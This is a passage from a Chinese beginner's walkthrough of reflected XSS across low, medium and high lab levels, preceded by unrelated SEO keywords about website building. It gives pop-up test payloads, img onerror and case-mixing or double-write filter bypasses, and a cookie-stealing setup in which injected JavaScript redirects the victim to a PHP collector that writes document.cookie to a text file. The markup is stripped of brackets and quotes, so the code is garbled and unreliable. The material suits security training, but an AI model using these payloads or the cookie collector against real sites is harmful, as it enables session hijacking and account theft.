天津响应式网站设计,怎么做网站维护宣传,做电子板报的网站,宁波专业建站xss#xff0c;反射型#xff0c;lowmedium low发现xss本地搭建实操 medium作为初学者的我第一次接触比较浅的绕过思路high low
发现xss
本关无过滤
scriptalert(/xss/)/script
//或
scriptconfirm(/xss/)/script
//或
scr… xss反射型lowmedium low发现xss本地搭建实操 medium作为初学者的我第一次接触比较浅的绕过思路high low
发现xss
本关无过滤
scriptalert(/xss/)/script
//或
scriptconfirm(/xss/)/script
//或
scriptprompt(/xss/)/script出现弹框则存在xss其中alertconfirm(prompt(为弹框函数
本地搭建
在www目录下放置cookie.php内容如下
?php$cookie$_GET[cookie];//将get请求参数存储到cookie变量中file_put_contents(cookie.txt,$cookie);//把偷取的用户cookie写到cookie.txt文件中。?js代码如下
scriptdocument.locationhttp://127.0.0.1/cookie.php/?cookiedocument.cookie;/script//document.location将页面的内容指定到指定位置。再在www目录下放置cookie.txt文件用于存放盗取的cookie
实操
目前txt文件什么也没有我们执行js代码 没有报错解析成功可以看到url地址栏中有用户的cookie此cookie已经储存进了攻击者的txt文件盗取成功
medium
关对
作为初学者的我第一次接触比较浅的绕过思路
Xss反射型 一判断是否存在xss 1:无过滤 使用弹窗函数编写js代码成功弹框 输入其他标签(未知领域) 输入img srcx οnerrοralert(/xss/)成功弹窗 3那尝试使用大小写混淆
4:或者双写绕过 sc 5还有很多方法自己探究吧相信在以后会掌握更多方法 二Js代码如下
三盗取cookie 本地www目录下搭建cookie.php 内容如下 ?php $cookie$_GET[cookie];//将get请求参数存储到cookie变量中 file_put_contents(cookie.txt,$cookie);//把偷取的用户cookie写到cookie.txt文件中。 ?
再创建cookie.txt文档用于存储盗取的cookie
high
尝试别的语言就可以执行
img src1 onerroralert(1)
